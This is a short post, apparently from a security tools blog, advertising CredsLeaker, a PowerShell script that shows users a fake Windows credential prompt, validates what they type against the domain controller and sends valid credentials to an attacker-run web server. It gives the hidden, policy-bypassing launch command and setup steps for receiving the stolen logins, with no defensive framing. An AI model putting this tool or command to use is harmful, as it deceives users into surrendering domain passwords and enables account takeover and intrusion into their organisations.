CredsLeaker is a powershell script that phishes information from the user. It will popup a user authentication box – The script will check the details against the domain controller until it has valid credentials. Normally this screen is pretty common in a domain scenario and the user may have seen this box before.
Once CredsLeaker has found valid credentials it will then send them to a webserver for storage.
You can download the script and view more information on the GitHub project page by clicking here.
The script can be executed with the following command:
powershell.exe -executionpolicy bypass -windowstyle hidden -noninteractive -nologo -file “CredsLeaker.ps1”
- Start a web server.
- Type your server IP and port in the ps1 script.
- Execute the batch file.